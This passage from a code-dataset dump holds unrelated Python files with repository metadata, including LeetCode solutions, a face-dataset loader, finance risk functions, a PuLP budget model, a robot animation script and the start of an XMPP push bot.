个互不相同的自然数和 1 个负数;\n\n因此这 n 个数互不相同,即我们得到了一个满足要求的数组。\n\nC++Python3\n\nclass Solution:\n def sumZero(self, n: int) -> List[int]:\n ans = [x for x in range(n - 1)]\n ans.append(-sum(ans))\n return ans\n复杂度分析\n\n时间复杂度:O(N)O(N)。\n\n空间复杂度:O(1)O(1),除了存储答案的数组 ans 之外,额外的空间复杂度是 O(1)O(1)。\n\n作者:LeetCode-Solution\n链接:https://leetcode-cn.com/problems/find-n-unique-integers-sum-up-to-zero/solution/he-wei-ling-de-nge-wei-yi-zheng-shu-by-leetcode-so/\n来源:力扣(LeetCode)\n著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。\n'''","repo_name":"MecaCho/algorithms_training","sub_path":"algorithms/arr/leetcode-1304-FindNUniqueIntegersSumuptoZero.py","file_name":"leetcode-1304-FindNUniqueIntegersSumuptoZero.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35441732334","text":"# Definition for a binary tree node.\r\n# class TreeNode(object):\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.left = 
None\r\n# self.right = None\r\n\r\nclass Solution(object):\r\n def buildTree(self, inorder, postorder):\r\n \"\"\"\r\n :type inorder: List[int]\r\n :type postorder: List[int]\r\n :rtype: TreeNode\r\n \"\"\"\r\n if not inorder:\r\n return None\r\n if len(inorder) == len(postorder) == 1:\r\n return TreeNode(postorder[-1])\r\n nodeVal = postorder[-1]\r\n i = inorder.index(nodeVal)\r\n root = TreeNode(nodeVal)\r\n if i > 0 :\r\n root.left = self.buildTree(inorder[:i], postorder[:i])\r\n if i < len(postorder)-1:\r\n root.right = self.buildTree(inorder[i+1:], postorder[i:-1])\r\n return root","repo_name":"kikihiter/LeetCode2","sub_path":"Medium/No106i.py","file_name":"No106i.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"2243180551","text":"#!/usr/bin/env python\n\"\"\"\nConcatinate run-specific csv files\n\"\"\"\n\nimport pandas as pd\nimport os\nfrom os.path import join\n\n\ndef concat(base_dir):\n\n subs = ['sub%03d' % i for i in xrange(1, 34)]\n runs = ['run%03d' % i for i in xrange(1, 12)]\n\n # make an output directory\n if not os.path.exists(join(base_dir, 'concatinated')):\n os.makedirs(join(base_dir, 'concatinated'))\n\n for sub in subs:\n files = [join(base_dir, run, '%s_%s.csv' % (sub, run)) for run in runs]\n df_list = [pd.read_csv(f) for f in files]\n full_df = pd.concat(df_list)\n full_df.reset_index(inplace=True, drop=True)\n outfilename = '%s.csv' % sub\n\n if not os.path.exists(join(base_dir, 'concatinated', outfilename)):\n full_df.to_csv(join(base_dir, 'concatinated', outfilename),\n index_label='idx')\n print('successfully written out file for %s' % sub)\n else:\n print('%s already exists and was not overwritten' % outfilename)\n\n\nif __name__ == '__main__':\n\n concat('/data/famface/openfmri/oli/results/extract_meants/csv')","repo_name":"oliver-contier/famface-temporal-dynamics","sub_path":"tetrad/concatinate_runs.py","file_name":"concatinate_runs.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10122521415","text":"import threading\nimport time\n\nnum = 0\n# 互斥锁\nmutex = threading.Lock()\n\ndef plus1():\n\tglobal num\n\t\n\tfor i in range(100000):\n\t\tmutex.acquire()\n\t\tnum += 1\n\t\tmutex.release()\n\ndef plus2():\n\tglobal num\n\t\n\tfor i in range(100000):\n\t\tmutex.acquire()\n\t\tnum += 1\n\t\tmutex.release()\n\ndef main():\n\tt1 = threading.Thread(target=plus1)\n\tt2 = threading.Thread(target=plus2)\n\n\tt1.start()\n\tt2.start()\n\ttime.sleep(2)\n\tprint(num)\n\nif __name__ == \"__main__\":\n\tmain()","repo_name":"MrRhine98/python_web","sub_path":"03_thread/thread_03.py","file_name":"thread_03.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33099194250","text":"import numpy\nimport pandas\nimport scipy.stats\n\nfrom src.measures_common import calculate_daily_return_proportioned\n\n\ndef calculate_value_at_risk(asset_total, asset_average, asset_volatility, confidence_interval=0.95):\n \"\"\"\n Calculates the Value at Risk of an a given asset.\n\n Arguments:\n - asset_total: Numeric, absolute value of all assets. \n - asset_average: Numeric, asset average return.\n - asset_volatility: Numeric, asset standard deviation.\n - confidence_lvl (optional): Numeric, confidence level for the VaR calculation. 
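    A worked example with illustrative numbers (not taken from the module):
    with asset_total=1_000_000, asset_average=0.0005, asset_volatility=0.02
    and the default confidence_interval=0.95, scipy.stats.norm.ppf(0.05) is
    roughly -1.645, so the function returns about
    1_000_000 * (0.0005 + 0.02 * 1.645) ≈ 33,400.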
\n Setpoint: 0.95, as used by JPM, GMS, and other IB/HF.\n\n Returns:\n - asset_VaR: Numeric, value at Risk of the asset.\n \"\"\"\n\n # Check if inputs are numeric\n if not all(isinstance(x, (int, float, numpy.number)) for x in [asset_total, asset_average, asset_volatility, confidence_interval]):\n raise TypeError(\"All inputs must be numeric.\")\n \n # Check if conf_level is within range\n if not 0 < confidence_interval < 1:\n raise ValueError(\"Confidence level should fall within the range of 0 to 1.\")\n\n # Calculate the inverse of the cumulative distribution function\n inverse_cdf_value_at_risk = scipy.stats.norm.ppf(1 - confidence_interval)\n\n # Calculate the difference between the mean return and the product of the standard deviation and the inverse cdf\n diff_value_at_risk = asset_average - asset_volatility * inverse_cdf_value_at_risk\n\n # Calculate Value at Risk by multiplying the investment with the difference\n asset_value_at_risk = asset_total * diff_value_at_risk\n return asset_value_at_risk\n\ndef calculate_downside_risk(input_stock_prices: pandas.DataFrame, proportion, risk_free_ROR=0.005427) -> float:\n \"\"\"\n Calculate the downside risk of a portfolio given stock prices, proportions, and a risk-free rate of return.\n \n Parameters:\n - input_stock_prices: DataFrame containing stock prices.\n - proportion: Weights of the assets in the portfolio.\n - risk_free_ROR: Risk-free rate of return. Default is 0.005427.\n \n Returns:\n - float: The calculated downside risk.\n \"\"\"\n try:\n # Validate inputs\n _validate_downside_input(input_stock_prices, pandas.DataFrame, \"Data must be a Pandas DataFrame.\")\n _validate_downside_input(proportion, (pandas.Series, numpy.ndarray), \"Weights must be a pandas Series or numpy ndarray.\")\n _validate_downside_input(risk_free_ROR, (int, float, numpy.integer, numpy.floating), \"Risk-free rate must be an integer or float.\")\n\n # Compute weighted daily mean returns\n wtd_daily_mean = calculate_daily_return_proportioned(input_stock_prices, proportion)\n\n # Compute downside risk\n downside_risk = _compute_downside_risk(wtd_daily_mean, risk_free_ROR)\n\n return downside_risk\n except Exception as e:\n print(f\"An error occurred while calculating downside risk: {str(e)}\")\n return None\n\ndef _validate_downside_input(value, expected_type, error_message):\n \"\"\"\n Validate the input values for type consistency.\n \n Parameters:\n - value: The input value to validate.\n - expected_type: The expected type of the input value.\n - error_message: The error message to raise if validation fails.\n \"\"\"\n if not isinstance(value, expected_type):\n raise ValueError(error_message)\n\ndef _compute_downside_risk(wtd_daily_mean, risk_free_ROR):\n \"\"\"\n Compute the downside risk of a portfolio.\n \n Parameters:\n - wtd_daily_mean: Weighted daily mean returns.\n - risk_free_ROR: Risk-free rate of return.\n \n Returns:\n - float: The calculated downside risk.\n \"\"\"\n # Calculate the differences between the weighted daily mean and the risk-free rate of return\n differences = wtd_daily_mean - risk_free_ROR\n\n # Identify the negative returns (returns below the risk-free rate)\n negative_returns = numpy.minimum(0, differences)\n\n # Square the negative returns\n squared_negative_returns = negative_returns ** 2\n\n # Calculate the mean of the squared negative returns\n mean_squared_negative_returns = numpy.mean(squared_negative_returns)\n\n # Calculate the square root of the mean of the squared negative returns\n downside_risk = 
numpy.sqrt(mean_squared_negative_returns)\n\n # Return the downside risk\n return downside_risk\n","repo_name":"wasimnoordin/EntroPy","sub_path":"src/measures_risk.py","file_name":"measures_risk.py","file_ext":"py","file_size_in_byte":4361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72348759413","text":"def fibonacci(aantal: int) -> list:\n lijst = [0,1]\n for i in range(aantal):\n lijst.append(lijst[i] + lijst[i + 1])\n snede = lijst[-1] / lijst[-2]\n return snede\n\nprint(fibonacci(50))\n\n\n\n \n \n\n\n \n\n","repo_name":"Ethiasdev/leren-programmeren","sub_path":"module_05/deel_01/opdracht_04/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":230,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"5068156684","text":"import os, sys\nimport torch\nfrom torch.utils.data import Dataset, DataLoader\nimport torchvision.transforms as transforms\nimport numpy as np\nimport cv2\nimport scipy\nfrom skimage.io import imread, imsave\nfrom skimage.transform import estimate_transform, warp, resize, rescale\nfrom glob import glob\nimport scipy.io\nfrom .utils import check_mkdir\n\nfrom . import detectors\n\ndef video2sequence(video_path):\n videofolder = video_path.split('.')[0]\n check_mkdir(videofolder)\n video_name = video_path.split('/')[-1].split('.')[0]\n vidcap = cv2.VideoCapture(video_path)\n success,image = vidcap.read()\n count = 0\n imagepath_list = []\n while success:\n imagepath = '{}/{}_frame{:04d}.jpg'.format(videofolder, video_name, count)\n cv2.imwrite(imagepath, image) # save frame as JPEG file\n success,image = vidcap.read()\n count += 1\n imagepath_list.append(imagepath)\n print('video frames are stored in {}'.format(videofolder))\n return imagepath_list\n\nclass TestData(Dataset):\n def __init__(self, testpath, iscrop=True, crop_size=224, scale=1.25, face_detector='mtcnn'):\n '''\n testpath: folder, imagepath_list, image path, video path\n '''\n if isinstance(testpath, list):\n self.imagepath_list = testpath\n elif os.path.isdir(testpath): \n self.imagepath_list = glob(testpath + '/*.jpg') + glob(testpath + '/*.png') + glob(testpath + '/*.bmp')\n elif os.path.isfile(testpath) and (testpath[-3:] in ['jpg', 'png', 'bmp']):\n self.imagepath_list = [testpath]\n elif os.path.isfile(testpath) and (testpath[-3:] in ['mp4', 'csv', 'vid', 'ebm']):\n self.imagepath_list = video2sequence(testpath)\n else:\n print(f'please check the test path: {testpath}')\n exit()\n print('total {} images'.format(len(self.imagepath_list)))\n self.imagepath_list = sorted(self.imagepath_list)\n self.crop_size = crop_size\n self.scale = scale\n self.iscrop = iscrop\n self.resolution_inp = crop_size\n if face_detector == 'fan':\n self.face_detector = detectors.FAN()\n # elif face_detector == 'mtcnn':\n # self.face_detector = detectors.MTCNN()\n else:\n print(f'please check the detector: {face_detector}')\n exit()\n\n def __len__(self):\n return len(self.imagepath_list)\n\n def bbox2point(self, left, right, top, bottom, type='bbox'):\n ''' bbox from detector and landmarks are different\n '''\n if type=='kpt68':\n old_size = (right - left + bottom - top)/2*1.1\n center = np.array([right - (right - left) / 2.0, bottom - (bottom - top) / 2.0 ])\n elif type=='bbox':\n old_size = (right - left + bottom - top)/2\n center = np.array([right - (right - left) / 2.0, bottom - (bottom - top) / 2.0 + old_size*0.12])\n else:\n raise NotImplementedError\n return old_size, 
center\n\n def __getitem__(self, index):\n imagepath = self.imagepath_list[index]\n imagename = imagepath.split('/')[-1].split('.')[0]\n\n image = np.array(imread(imagepath))\n if len(image.shape) == 2:\n image = image[:,:,None].repeat(1,1,3)\n if len(image.shape) == 3 and image.shape[2] > 3:\n image = image[:,:,:3]\n\n h, w, _ = image.shape\n if self.iscrop:\n # provide kpt as txt file, or mat file (for AFLW2000)\n kpt_matpath = imagepath.replace('.jpg', '.mat').replace('.png', '.mat')\n kpt_txtpath = imagepath.replace('.jpg', '.txt').replace('.png', '.txt')\n if os.path.exists(kpt_matpath):\n kpt = scipy.io.loadmat(kpt_matpath)['pt3d_68'].T \n left = np.min(kpt[:,0]); right = np.max(kpt[:,0]); \n top = np.min(kpt[:,1]); bottom = np.max(kpt[:,1])\n old_size, center = self.bbox2point(left, right, top, bottom, type='kpt68')\n elif os.path.exists(kpt_txtpath):\n kpt = np.loadtxt(kptpath)\n left = np.min(kpt[:,0]); right = np.max(kpt[:,0]); \n top = np.min(kpt[:,1]); bottom = np.max(kpt[:,1])\n old_size, center = self.bbox2point(left, right, top, bottom, type='kpt68')\n else:\n bbox, bbox_type = self.face_detector.run(image)\n if len(bbox) < 4:\n print('no face detected! run original image')\n left = 0; right = h-1; top=0; bottom=w-1\n else:\n left = bbox[0]; right=bbox[2]\n top = bbox[1]; bottom=bbox[3]\n old_size, center = self.bbox2point(left, right, top, bottom, type=bbox_type)\n size = int(old_size*self.scale)\n src_pts = np.array([[center[0]-size/2, center[1]-size/2], [center[0] - size/2, center[1]+size/2], [center[0]+size/2, center[1]-size/2]])\n else:\n src_pts = np.array([[0, 0], [0, h-1], [w-1, 0]])\n \n DST_PTS = np.array([[0,0], [0,self.resolution_inp - 1], [self.resolution_inp - 1, 0]])\n tform = estimate_transform('similarity', src_pts, DST_PTS)\n \n image = image/255.\n\n dst_image = warp(image, tform.inverse, output_shape=(self.resolution_inp, self.resolution_inp))\n dst_image = dst_image.transpose(2,0,1)\n return {'image': torch.tensor(dst_image).float(),\n 'imagename': imagename,\n # 'tform': tform,\n # 'original_image': torch.tensor(image.transpose(2,0,1)).float(),\n }","repo_name":"phantomKid13/3D-Face-Reconstruction","sub_path":"constructor/deca/decalib/datasets/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":5636,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"1797574062","text":"class Node:\n def __init__(self, val):\n self.left = None\n self.val = val\n self.right = None\n\ndef preorder(root):\n if not root:\n return\n\n print(root.val, end=\" \")\n preorder(root.left)\n preorder(root.right)\n\ndef inorder(root):\n if not root:\n return\n\n inorder(root.left)\n print(root.val, end=\" \")\n inorder(root.right)\n\ndef inorder_iter(root):\n stack = [root]\n left = []\n\n while stack:\n ptr = stack[-1]\n if ptr.left and ptr not in left:\n stack.append(ptr.left)\n left.append(ptr)\n else:\n print(ptr.val, end=\" \")\n stack.pop()\n if ptr.right:\n stack.append(ptr.right)\n\n\ndef insert(root, val):\n if not root:\n return Node(val)\n\n if val > root.val:\n root.right = insert(root.right, val)\n if val < root.val:\n root.left = insert(root.left, val)\n\n return root\n\ndef inorder_predecessor(root):\n root = root.left\n\n while root and root.right:\n root = root.right\n\n return root\n\ndef inorder_successor(root):\n root = root.right\n\n while root and root.left:\n root = root.left\n\n return root\n\ndef delete(root, val):\n if not root:\n return \n\n if val > root.val:\n root.right = 
delete(root.right, val)\n elif val < root.val:\n root.left = delete(root.left, val)\n else:\n p = inorder_predecessor(root) or inorder_successor(root)\n\n if not p:\n return None\n\n root.val = p.val\n root.left = delete(root.left, p.val)\n root.right = delete(root.right, p.val)\n \n return root\n\nroot = Node(50)\ninsert(root, 10)\ninsert(root, 40)\ninsert(root, 20)\ninsert(root, 30)\ninorder(root)\nprint()\ninorder_iter(root)\n","repo_name":"agpranjal/algorithms","sub_path":"bst.py","file_name":"bst.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10137351561","text":"\"\"\"\nThis is the most basic implementation of MarketUp formulation.\n\nThis version uses PuLP as a modeling language and CBC as a solver.\n\nCreated by Rohit Karvekar (Aug, 22) for Mip Wise.\n\"\"\"\n\nimport pulp\n\n# Input Data\n# marketing channels\nmc = {1: 'Print', 2: 'TV', 3: 'SEO', 4: 'Social Media'}\nI = list(mc)\n# expected ROI\nr = {1: 1.16, 2: 1.09, 3: 1.06, 4: 1.14}\n# expected market penetration\np = {1: 2.1, 2: 2.5, 3: 3.0, 4: 0.9}\n# total budget\ntb = 1_000_000\n# print budget\npb = 100_000\n# viewer target\nvt = 1_500_000\n# minimum conventional channel allocation\nca = 0.4\n\n# Define the model\nmdl = pulp.LpProblem('market_up', sense=pulp.LpMaximize)\n\n# Add variables\nx = pulp.LpVariable.dicts(indices=I, cat=pulp.LpContinuous, name='x')\n\n# Add Constraints\n# C1) Can't exceed the total budget\nmdl.addConstraint(pulp.lpSum(x) <= tb, name='C1')\n# C2) Minimum allocation to conventional channels\nmdl.addConstraint(pulp.lpSum(x[i] for i in [1, 2]) >= ca * tb, name='C2')\n# C3) Can't exceed the print budget\nmdl.addConstraint(x[1] <= pb, name='C3')\n# C4) Social Media investment must be at most three times SEO investment\nmdl.addConstraint(x[4] <= 3 * x[3], name='C4')\n# C5) Reach minimum viewers target\nmdl.addConstraint(pulp.lpSum(p[i] * x[i] for i in I) >= vt, name='C5')\n\n# Set the objective function\ntotal_roi = pulp.lpSum(r[i] * x[i] for i in I)\nmdl.setObjective(total_roi)\n\n# Optimize\nmdl.solve()\n\n# Retrieve the solution\nx_sol = {mc[i]: int(x[i].value()) for i in I}\nprint(f'Total ROI: {total_roi.value()}')\nprint(f'Optimal budget allocation: {x_sol}')\n\n","repo_name":"mipwise/use-cases","sub_path":"marketup/scripts/marketup_pulp.py","file_name":"marketup_pulp.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"41727702636","text":"__author__ = 'shaunjl'\n\n\"\"\"\nTastypie REST API tests for ResolveDOI(View)\n\n\"\"\"\nfrom tastypie.test import ResourceTestCase, TestApiClient\nfrom django.contrib.auth.models import User\nfrom hs_core import hydroshare\nfrom tastypie.serializers import Serializer\n\nclass TestResolveDOIView(ResourceTestCase):\n\n serializer = Serializer()\n\n def setUp(self):\n self.api_client = TestApiClient()\n user = hydroshare.create_account(\n 'shaun@gmail.com',\n username='user0',\n first_name='User0_FirstName',\n last_name='User0_LastName',\n )\n\n self.res = hydroshare.create_resource('GenericResource', user, 'myres')\n hydroshare.publish_resource(self.res.short_id)\n\n def tearDown(self):\n User.objects.all().delete()\n hydroshare.delete_resource(self.res.short_id)\n\n def test_get(self):\n\n url = 'hsapi/resolveDOI/{0}/'.format(self.res.doi)\n resp = self.api_client.get(url)\n\n self.assertValidJSONResponse(resp)\n\n resp_pk = self.deserialize(resp)\n\n 
self.assertEqual(self.res.short_id, resp_pk)\n\n def test_bad_doi(self):\n\n url = 'hsapi/resolveDOI/{0}/'.format('bad_doi')\n resp = self.api_client.get(url)\n\n self.assertEqual(resp.status_code, 404)\n","repo_name":"hydroshare/hs_core","sub_path":"tests/api/http/test_resolve_doi_view.py","file_name":"test_resolve_doi_view.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"74403134771","text":"import speect\nimport speect.uttproc_cb # utterance callback interface\nimport speect.phoneset\n\n\ndef utt_processor(utt):\n # we require the word, segment and phrase relation \n word_rel = utt.relation_get(\"Word\")\n if word_rel is None:\n raise RuntimeError(\"Failed to find 'Word' relation of utterance\")\n\n segment_rel = utt.relation_get(\"Segment\")\n if segment_rel is None:\n raise RuntimeError(\"Failed to find 'Segment' relation of utterance\")\n\n phrase_rel = utt.relation_get(\"Phrase\")\n if phrase_rel is None:\n raise RuntimeError(\"Failed to find 'Phrase' relation of utterance\")\n\n # get phoneset from voice\n voice = utt.voice\n if voice is None:\n raise RuntimeError(\"Failed to find 'voice' of utterance\")\n \n phoneset = voice.data_get(\"phoneset\")\n if phoneset is None:\n raise RuntimeError(\"Failed to find 'phoneset' of voice\")\n \n # get silence phone\n silence_phone = phoneset.features[\"silence_phone\"]\n \n # Insert initial silence \n segment_item = segment_rel.head()\n if segment_item is None:\n silence_item = segment_rel.append()\n else:\n silence_item = segment_item.prepend()\n\n silence_item[\"name\"] = silence_phone\n\n # now go through phrases\n for phrase_item in phrase_rel:\n word_item = phrase_item.daughter(-1) # -1 for last daughter\n\n while word_item is not None:\n segment_item = word_item.path_to_item(\"R:SylStructure.daughtern.daughtern.R:Segment\")\n \n if segment_item is not None:\n silence_item = segment_item.append()\n silence_item[\"name\"] = silence_phone\n break\n \n word_item = word_item.prev()\n\n \n \n","repo_name":"mivoq/speect","sub_path":"swig/python/speect/modules/pause_processor.py","file_name":"pause_processor.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"34567961153","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport sys\n\nspeed=int(sys.argv[1])\n\npos_rbt=np.loadtxt('rbt.txt')\npos_cldr=np.loadtxt('cldr.txt')\nTT=len(pos_rbt)\n# pos_rbt=np.reshape(np.loadtxt('rbt.txt'),[TT,3])\n# pos_cldr=np.reshape(np.loadtxt('cldr.txt'),[TT,3])\n\nfig=plt.figure()\nax_sim=fig.add_subplot(111)\nax_sim.set_xlim([-10, 10])\nax_sim.set_ylim([-1, 10])\n\nax_sim.set_aspect('equal')\n\nr_radius=0.5\nc_radius=0.5\n\nrbt=plt.Circle(pos_rbt[0,0:2], radius=r_radius, fc=np.array([0,0,1]), alpha=1.0)\nrbt=ax_sim.add_patch(rbt)\n\nrbt_angle=(pos_rbt[0,2]*np.pi/180.0)\nrbt_lnx=(pos_rbt[0,0]+1.2*r_radius)*np.cos(pos_rbt[0,2]*np.pi/180.0)\nrbt_lny=(pos_rbt[0,0]+1.2*r_radius)*np.sin(pos_rbt[0,2]*np.pi/180.0)\nrbt_ln,=ax_sim.plot([pos_rbt[0,0],rbt_lnx], [pos_rbt[0,1], rbt_lny], linewidth=2.0, c=[0,0,0])\n\ncldr=plt.Circle(pos_cldr[0,0:2], radius=c_radius, fc=np.array([1,0,0]), 
alpha=1.0)\nax_sim.add_patch(cldr)\ncldr_angle=(pos_cldr[0,2]*np.pi/180.0)\ncldr_lnx=(1.2*c_radius)*np.cos(pos_cldr[0,2]*np.pi/180.0)\ncldr_lny=(1.2*c_radius)*np.sin(pos_cldr[0,2]*np.pi/180.0)\ncldr_ln,=ax_sim.plot([pos_cldr[0,0],pos_cldr[0,0]+cldr_lnx], [pos_cldr[0,1], pos_cldr[0,1]+cldr_lny], linewidth=2.0, c=[0,0,0])\n\ndef animate(t):\n if t==0:\n plt.waitforbuttonpress()\n if t*speed%100==0:\n print(t*speed)\n\n rbt.center=pos_rbt[speed*t,0],pos_rbt[speed*t,1]\n print(pos_rbt[t,0:2])\n\n pt_x=(1.2*r_radius)*np.cos(pos_rbt[speed*t,2]*np.pi/180.0)\n pt_y=(1.2*r_radius)*np.sin(pos_rbt[speed*t,2]*np.pi/180.0)\n rbt_ln.set_data([pos_rbt[speed*t,0], pos_rbt[speed*t,0]+pt_x], [pos_rbt[speed*t,1], pos_rbt[speed*t,1]+pt_y])\n \n cldr.center=pos_cldr[speed*t,0],pos_cldr[speed*t,1]\n pt_x=(1.2*c_radius)*np.cos(pos_cldr[speed*t,2]*np.pi/180.0)\n pt_y=(1.2*c_radius)*np.sin(pos_cldr[speed*t,2]*np.pi/180.0)\n cldr_ln.set_data([pos_cldr[speed*t,0], pos_cldr[speed*t,0]+pt_x], [pos_cldr[speed*t,1], pos_cldr[speed*t,1]+pt_y])\n\n # for i in np.arange(len(agents)):\n # agents[i].center=pos[speed*t,i,0],pos[speed*t,i,1]\n # # print du_min, du_max, pos[speed*t,i,2]\n # c=(pos[speed*t,i,2]-du_min)/(du_max-du_min+0.001)\n # agents[i].set_fc((0,c,c))\n # return rbt_ln,\n\nline_ani = animation.FuncAnimation(fig, animate, frames=int(TT/speed), interval=5, blit=False, repeat=False)\n\nplt.show()","repo_name":"ccimrie/DeepDECS","sub_path":"case_studies/mobile_robot_collision_limitation/simulator/visualiser/waypoint.py","file_name":"waypoint.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27800025975","text":"#BruteForce - 분해합(decompose sum)\n\nn = int(input())\nresult = 0\n \nfor i in range(n+1):\n digit = list(map(int, str(i))) #build a list with integer nums\n if(sum(digit) + i == n):\n result = i\n break\nprint(result)\n","repo_name":"dasollee2525/Baekjoon-Algorithm","sub_path":"BruteForce/2231.py","file_name":"2231.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9644621571","text":"import csv\nimport os\n\nos.chdir(\"/Users/stefanslater/Desktop/Reasoning Mind\")\n\nwith open(\"Pre-survey AY 16-17.csv\",\"rU\") as f:\n d = list(csv.reader(f))\n \n# removing students who failed to answer all questions.\n\ndroprows = []\nfor n,li in enumerate(d):\n if \"NA\" in li[3:]:\n droprows.append(n)\n \ndroprows.sort(reverse=True)\n\nfor i in droprows:\n del d[i] \n\n# removing questions that we are no longer using: 6, 13, 14\ndropcols = ['Q6','Q13','Q14','Grade','Timestamp']\nnewd = []\nwriter = csv.writer(open(\"20170915_ReasMindLCAInput.csv\",\"wb\"))\nfor li in d[1:]:\n newd.append([x for n,x in enumerate(li) if d[0][n] not in dropcols])\n \nfor li in newd:\n for n,x in enumerate(li[1:]):\n if int(x) >= 3:\n li[n+1] = 1\n else:\n li[n+1] = 0\n writer.writerow(li)","repo_name":"cjc2238/Assistments-Competition","sub_path":"Stefan Reresources/2016119_Data_Processing.py","file_name":"2016119_Data_Processing.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32684670546","text":"#!/usr/bin/env python3\n########################################################################\n# File name: pushbot.py\n# This file is part of: aioxmpp\n#\n# LICENSE\n#\n# This program is free software: you can redistribute it 
and/or modify\n# it under the terms of the GNU Lesser General Public License as\n# published by the Free Software Foundation, either version 3 of the\n# License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful, but\n# WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU\n# Lesser General Public License for more details.\n#\n# You should have received a copy of the GNU Lesser General Public\n# License along with this program. If not, see\n# .\n#\n########################################################################\nimport asyncio\nimport json\nimport logging\nimport pathlib\nimport socket\nimport signal\n\nimport toml\n\nimport aioxmpp\n\n\nclass MessageProtocol(asyncio.DatagramProtocol):\n def __init__(self, queue):\n super().__init__()\n self.logger = logging.getLogger(type(self).__name__)\n self.queue = queue\n\n def datagram_received(self, data, addr):\n try:\n parsed = json.loads(data.decode(\"utf-8\"))\n except Exception:\n self.logger.error(\"failed to parse client message %r\",\n data,\n exc_info=True)\n return\n\n try:\n self.queue.put_nowait(parsed)\n except asyncio.QueueFull:\n self.logger.error(\"input queue full! dropped message %r\",\n parsed)\n\n\nasync def process_item(item, rooms, logger):\n target_rooms = rooms.keys()\n\n tokens = []\n\n for room_address in target_rooms:\n try:\n room_info = rooms[room_address]\n except KeyError:\n continue\n\n body_parts = []\n\n if room_info[\"head_format\"]:\n body_parts.append(\n room_info[\"head_format\"].format(\n nitems=len(item[\"items\"]),\n root_item=item,\n )\n )\n\n for sub_item in item[\"items\"]:\n required_fields = room_info[\"required_fields\"]\n if required_fields:\n item_fields = set(sub_item.keys()) & required_fields\n if len(item_fields) < len(required_fields):\n continue\n\n format_ = room_info[\"format\"]\n if format_:\n body = format_.format(**sub_item)\n else:\n body = repr(item)\n\n body_parts.append(body)\n\n msg = aioxmpp.Message(\n type_=aioxmpp.MessageType.GROUPCHAT,\n )\n msg.body[None] = \"\\n\".join(body_parts)\n\n tokens.append(asyncio.ensure_future(\n room_info[\"room\"].send_message(msg)\n ))\n\n if not tokens:\n logger.warning(\"item %r generated no message!\", item)\n return\n\n await asyncio.wait(tokens, return_when=asyncio.ALL_COMPLETED)\n\n\nasync def process_queue(queue, rooms):\n logger = logging.getLogger(\"processor\")\n\n while True:\n item = await queue.get()\n try:\n await process_item(item, rooms, logger)\n except Exception:\n logger.error(\"failed to process item!\", exc_info=True)\n continue\n\n\nasync def amain(loop, xmpp_cfg, unix_cfg, mucs):\n message_queue = asyncio.Queue(maxsize=16)\n message_handler = MessageProtocol(message_queue)\n\n sigint_received = asyncio.Event()\n sigint_future = asyncio.ensure_future(sigint_received.wait())\n\n loop.add_signal_handler(signal.SIGINT, sigint_received.set)\n loop.add_signal_handler(signal.SIGTERM, sigint_received.set)\n\n socket_path, = unix_cfg\n\n sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM, 0)\n sock.bind(str(socket_path))\n\n unix_transport, _ = await loop.create_datagram_endpoint(\n lambda: message_handler,\n sock=sock,\n )\n\n address, password = xmpp_cfg\n\n xmpp_client = aioxmpp.Client(\n address,\n aioxmpp.make_security_layer(password)\n )\n\n muc_client = xmpp_client.summon(aioxmpp.MUCClient)\n\n try:\n async with xmpp_client.connected() as stream:\n rooms = {}\n for muc_info in mucs:\n 
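                # muc_client.join() hands back the Room object together with a
                # future that resolves once the MUC join handshake completes;
                # awaiting that future below ensures the bot is actually present
                # in the room before any group-chat messages are sent.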
